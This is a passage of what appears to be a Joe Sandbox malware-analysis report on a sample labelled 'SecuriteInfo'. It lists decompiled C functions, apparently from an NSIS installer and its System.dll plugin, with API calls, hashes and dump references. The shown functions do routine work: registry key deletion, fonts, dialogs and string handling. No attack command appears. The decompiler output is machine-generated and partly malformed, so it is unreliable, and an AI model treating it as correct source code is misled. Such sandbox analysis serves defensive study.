                                                                            					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                                            					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                                            					_t52 = _t51[0x18];
                                                                            					if(_t52 == 0) {
                                                                            						goto L9;
                                                                            					}
                                                                            					_t41 = 0x1a;
                                                                            					if(_t52 == _t41) {
                                                                            						goto L9;
                                                                            					}
                                                                            					if(_t52 != 0xffffffff) {
                                                                            						if(_t52 <= 0 || _t52 > 0x19) {
                                                                            							_t51[0x18] = _t41;
                                                                            							goto L12;
                                                                            						} else {
                                                                            							_t37 = E713C135A(_t52 - 1);
                                                                            							L10:
                                                                            							goto L11;
                                                                            						}
                                                                            					} else {
                                                                            						_t37 = E713C12E3();
                                                                            						L11:
                                                                            						_t52 = _t37;
                                                                            						L12:
                                                                            						_t13 =  &(_t51[8]); // 0x1020
                                                                            						_t42 = _t13;
                                                                            						if(_t51[4] >= 0) {
                                                                            						}
                                                                            						_t38 =  *_t51 & 0x000000ff;
                                                                            						_t51[0x1c] = 0;
                                                                            						if(_t38 > 7) {
                                                                            							L27:
                                                                            							_t39 = GlobalFree(_t52);
                                                                            							if( *(_t54 + 0x10) == 0) {
                                                                            								return _t39;
                                                                            							}
                                                                            							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                                            								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                                            							} else {
                                                                            								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                                            							}
                                                                            							continue;
                                                                            						} else {
                                                                            							switch( *((intOrPtr*)(_t38 * 4 +  &M713C25F8))) {
                                                                            								case 0:
                                                                            									 *_t42 = 0;
                                                                            									goto L27;
                                                                            								case 1:
                                                                            									__eax = E713C13B1(__ebp);
                                                                            									goto L21;
                                                                            								case 2:
                                                                            									 *__edi = E713C13B1(__ebp);
                                                                            									__edi[1] = __edx;
                                                                            									goto L27;
                                                                            								case 3:
                                                                            									__eax = GlobalAlloc(0x40,  *0x713c506c);
                                                                            									 *(__esi + 0x1c) = __eax;
                                                                            									__edx = 0;
                                                                            									 *__edi = __eax;
                                                                            									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x713c506c, __eax,  *0x713c506c, 0, 0);
                                                                            									goto L27;
                                                                            								case 4:
                                                                            									__eax = E713C12CC(__ebp);
                                                                            									 *(__esi + 0x1c) = __eax;
                                                                            									L21:
                                                                            									 *__edi = __eax;
                                                                            									goto L27;
                                                                            								case 5:
                                                                            									__eax = GlobalAlloc(0x40, 0x10);
                                                                            									_push(__eax);
                                                                            									 *(__esi + 0x1c) = __eax;
                                                                            									_push(__ebp);
                                                                            									 *__edi = __eax;
                                                                            									__imp__CLSIDFromString();
                                                                            									goto L27;
                                                                            								case 6:
                                                                            									if( *__ebp != __cx) {
                                                                            										__eax = E713C13B1(__ebp);
                                                                            										 *__ebx = __eax;
                                                                            									}
                                                                            									goto L27;
                                                                            								case 7:
                                                                            									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                            									( *(__esi + 0x18) - 1) *  *0x713c506c =  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18;
                                                                            									 *__ebx =  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18;
                                                                            									asm("cdq");
                                                                            									__eax = E713C1510(__edx,  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2 + 0x18, __edx,  *0x713c5074 + ( *(__esi + 0x18) - 1) *  *0x713c506c * 2);
                                                                            									goto L27;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					L9:
                                                                            					_t37 = E713C12CC(0x713c5044);
                                                                            					goto L10;
                                                                            				}
                                                                            			}












                                                                            APIs
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C25C2
                                                                              • Part of subcall function 713C12CC: lstrcpynW.KERNEL32(00000000,?,713C137F,00000019,713C11CA,-000000A0), ref: 713C12DC
                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 713C2548
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 713C2563
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                            • String ID:
                                                                            • API String ID: 4216380887-0
                                                                            • Opcode ID: b38d542cf78b84698811baa9d6bc4e18e871636371a1b5ecc08690f067d1f984
                                                                            • Instruction ID: 03f9bb21040c2685aecb1f0c1cd4c180926e5659b142ec7529748f9dbc05b3aa
                                                                            • Opcode Fuzzy Hash: b38d542cf78b84698811baa9d6bc4e18e871636371a1b5ecc08690f067d1f984
                                                                            • Instruction Fuzzy Hash: 65419EB110830ADFD715DF29D840E26B7BDFB58B18F10891EE847965C1EB30E949CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 48%
                                                                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                            				void* _v8;
                                                                            				int _v12;
                                                                            				short _v536;
                                                                            				void* _t27;
                                                                            				signed int _t33;
                                                                            				intOrPtr* _t35;
                                                                            				signed int _t45;
                                                                            				signed int _t46;
                                                                            				signed int _t47;
                                                                            
                                                                            				_t46 = _a12;
                                                                            				_t47 = _t46 & 0x00000300;
                                                                            				_t45 = _t46 & 0x00000001;
                                                                            				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                            				if(_t27 == 0) {
                                                                            					if((_a12 & 0x00000002) == 0) {
                                                                            						L3:
                                                                            						_push(0x105);
                                                                            						_push( &_v536);
                                                                            						_push(0);
                                                                            						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                            							__eflags = _t45;
                                                                            							if(__eflags != 0) {
                                                                            								L10:
                                                                            								RegCloseKey(_v8);
                                                                            								return 0x3eb;
                                                                            							}
                                                                            							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                            							__eflags = _t33;
                                                                            							if(_t33 != 0) {
                                                                            								break;
                                                                            							}
                                                                            							_push(0x105);
                                                                            							_push( &_v536);
                                                                            							_push(_t45);
                                                                            						}
                                                                            						RegCloseKey(_v8);
                                                                            						_t35 = E0040690A(3);
                                                                            						if(_t35 != 0) {
                                                                            							return  *_t35(_a4, _a8, _t47, 0);
                                                                            						}
                                                                            						return RegDeleteKeyW(_a4, _a8);
                                                                            					}
                                                                            					_v12 = 0;
                                                                            					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                            						goto L10;
                                                                            					}
                                                                            					goto L3;
                                                                            				}
                                                                            				return _t27;
                                                                            			}













                                                                            APIs
                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnum$DeleteValue
                                                                            • String ID:
                                                                            • API String ID: 1354259210-0
                                                                            • Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                            • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                            • Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
                                                                            • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00401D81(void* __ebx, void* __edx) {
                                                                            				struct HWND__* _t30;
                                                                            				WCHAR* _t38;
                                                                            				void* _t48;
                                                                            				void* _t53;
                                                                            				signed int _t55;
                                                                            				signed int _t60;
                                                                            				long _t63;
                                                                            				void* _t65;
                                                                            
                                                                            				_t53 = __ebx;
                                                                            				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                                                            					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                                                            				} else {
                                                                            					E00402D84(2);
                                                                            					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                                                            				}
                                                                            				_t55 =  *(_t65 - 0x24);
                                                                            				 *(_t65 + 8) = _t30;
                                                                            				_t60 = _t55 & 0x00000004;
                                                                            				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                                                            				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                                                            				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                                                            				if((_t55 & 0x00010000) == 0) {
                                                                            					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                                                            				} else {
                                                                            					_t38 = E00402DA6(0x11);
                                                                            				}
                                                                            				 *(_t65 - 0x44) = _t38;
                                                                            				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                                                            				asm("sbb esi, esi");
                                                                            				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                                                            				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                                                            				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                                                            					DeleteObject(_t48);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                                                            					_push(_t63);
                                                                            					E00406484();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                            • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                            • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                            • String ID:
                                                                            • API String ID: 1849352358-0
                                                                            • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                            • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                            • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 73%
                                                                            			E00401E4E(intOrPtr __edx) {
                                                                            				void* __edi;
                                                                            				int _t9;
                                                                            				signed char _t15;
                                                                            				struct HFONT__* _t18;
                                                                            				intOrPtr _t30;
                                                                            				void* _t31;
                                                                            				struct HDC__* _t33;
                                                                            				void* _t35;
                                                                            
                                                                            				_t30 = __edx;
                                                                            				_t33 = GetDC( *(_t35 - 8));
                                                                            				_t9 = E00402D84(2);
                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                            				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                                                            				ReleaseDC( *(_t35 - 8), _t33);
                                                                            				 *0x40ce00 = E00402D84(3);
                                                                            				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                                                            				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                                                            				 *0x40ce07 = 1;
                                                                            				 *0x40ce04 = _t15 & 0x00000001;
                                                                            				 *0x40ce05 = _t15 & 0x00000002;
                                                                            				 *0x40ce06 = _t15 & 0x00000004;
                                                                            				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
                                                                            				_t18 = CreateFontIndirectW(0x40cdf0);
                                                                            				_push(_t18);
                                                                            				_push(_t31);
                                                                            				E00406484();
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401E51
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000), ref: 00406779
                                                                            • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                            • String ID:
                                                                            • API String ID: 2584051700-0
                                                                            • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                            • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                            • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                            • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E713C16BD(struct HINSTANCE__* _a4, short* _a8) {
                                                                            				_Unknown_base(*)()* _t7;
                                                                            				void* _t10;
                                                                            				int _t14;
                                                                            
                                                                            				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                            				_t10 = GlobalAlloc(0x40, _t14);
                                                                            				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                            				_t7 = GetProcAddress(_a4, _t10);
                                                                            				GlobalFree(_t10);
                                                                            				return _t7;
                                                                            			}







                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16D5
                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16DC
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,713C22D8,?,00000808), ref: 713C16F0
                                                                            • GetProcAddress.KERNEL32(713C22D8,00000000), ref: 713C16F7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 713C1700
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206470499574.00000000713C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 713C0000, based on PE: true
                                                                            • Associated: 00000002.00000002.206470427248.00000000713C0000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470593147.00000000713C4000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000002.00000002.206470665891.00000000713C6000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_713c0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                            • String ID:
                                                                            • API String ID: 1148316912-0
                                                                            • Opcode ID: 89fd79939c9c2bb1e11406c80b1c322efae4f1ae5b0cf940551184fb39f32c11
                                                                            • Instruction ID: 56541cbd284baba1caeaf82e073ceb9c4e65cc770e3da3620a91d1dc8fd83923
                                                                            • Opcode Fuzzy Hash: 89fd79939c9c2bb1e11406c80b1c322efae4f1ae5b0cf940551184fb39f32c11
                                                                            • Instruction Fuzzy Hash: 92F0AC7324A1387FE6211AA78C4CD9BBE9DEF8B2F5B210215F628D21D086626D01D7F1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            			E00401C43(intOrPtr __edx) {
                                                                            				int _t29;
                                                                            				long _t30;
                                                                            				signed int _t32;
                                                                            				WCHAR* _t35;
                                                                            				long _t36;
                                                                            				int _t41;
                                                                            				signed int _t42;
                                                                            				int _t46;
                                                                            				int _t56;
                                                                            				intOrPtr _t57;
                                                                            				struct HWND__* _t63;
                                                                            				void* _t64;
                                                                            
                                                                            				_t57 = __edx;
                                                                            				_t29 = E00402D84(3);
                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            				 *(_t64 - 0x18) = _t29;
                                                                            				_t30 = E00402D84(4);
                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            				 *(_t64 + 8) = _t30;
                                                                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                            				}
                                                                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                            					 *(_t64 + 8) = E00402DA6(0x44);
                                                                            				}
                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                            				_push(1);
                                                                            				if(__eflags != 0) {
                                                                            					_t61 = E00402DA6();
                                                                            					_t32 = E00402DA6();
                                                                            					asm("sbb ecx, ecx");
                                                                            					asm("sbb eax, eax");
                                                                            					_t35 =  ~( *_t31) & _t61;
                                                                            					__eflags = _t35;
                                                                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                            					goto L10;
                                                                            				} else {
                                                                            					_t63 = E00402D84();
                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            					_t41 = E00402D84(2);
                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                            					if(__eflags == 0) {
                                                                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                            						L10:
                                                                            						 *(_t64 - 0x38) = _t36;
                                                                            					} else {
                                                                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                            						asm("sbb eax, eax");
                                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                            					}
                                                                            				}
                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                            					_push( *(_t64 - 0x38));
                                                                            					E00406484();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                            				return 0;
                                                                            			}
















                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                            • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                            • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                            • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                            				char _v68;
                                                                            				char _v132;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t23;
                                                                            				signed int _t24;
                                                                            				void* _t31;
                                                                            				void* _t33;
                                                                            				void* _t34;
                                                                            				void* _t44;
                                                                            				signed int _t46;
                                                                            				signed int _t50;
                                                                            				signed int _t52;
                                                                            				signed int _t53;
                                                                            				signed int _t55;
                                                                            
                                                                            				_t23 = _a16;
                                                                            				_t53 = _a12;
                                                                            				_t44 = 0xffffffdc;
                                                                            				if(_t23 == 0) {
                                                                            					_push(0x14);
                                                                            					_pop(0);
                                                                            					_t24 = _t53;
                                                                            					if(_t53 < 0x100000) {
                                                                            						_push(0xa);
                                                                            						_pop(0);
                                                                            						_t44 = 0xffffffdd;
                                                                            					}
                                                                            					if(_t53 < 0x400) {
                                                                            						_t44 = 0xffffffde;
                                                                            					}
                                                                            					if(_t53 < 0xffff3333) {
                                                                            						_t52 = 0x14;
                                                                            						asm("cdq");
                                                                            						_t24 = 1 / _t52 + _t53;
                                                                            					}
                                                                            					_t25 = _t24 & 0x00ffffff;
                                                                            					_t55 = _t24 >> 0;
                                                                            					_t46 = 0xa;
                                                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                            				} else {
                                                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                            					_t50 = 0;
                                                                            				}
                                                                            				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                            				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                            				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                            				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                            				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                            			}




















                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                            • wsprintfW.USER32 ref: 00404DF0
                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s
                                                                            • API String ID: 3540041739-3551169577
                                                                            • Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                            • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                            • Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
                                                                            • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E00405E0C(WCHAR* _a4) {
                                                                            				WCHAR* _t9;
                                                                            
                                                                            				_t9 = _a4;
                                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                                            				_push(_t9);
                                                                            				if( *(CharPrevW()) != 0x5c) {
                                                                            					lstrcatW(_t9, 0x40a014);
                                                                            				}
                                                                            				return _t9;
                                                                            			}





                                                                            APIs
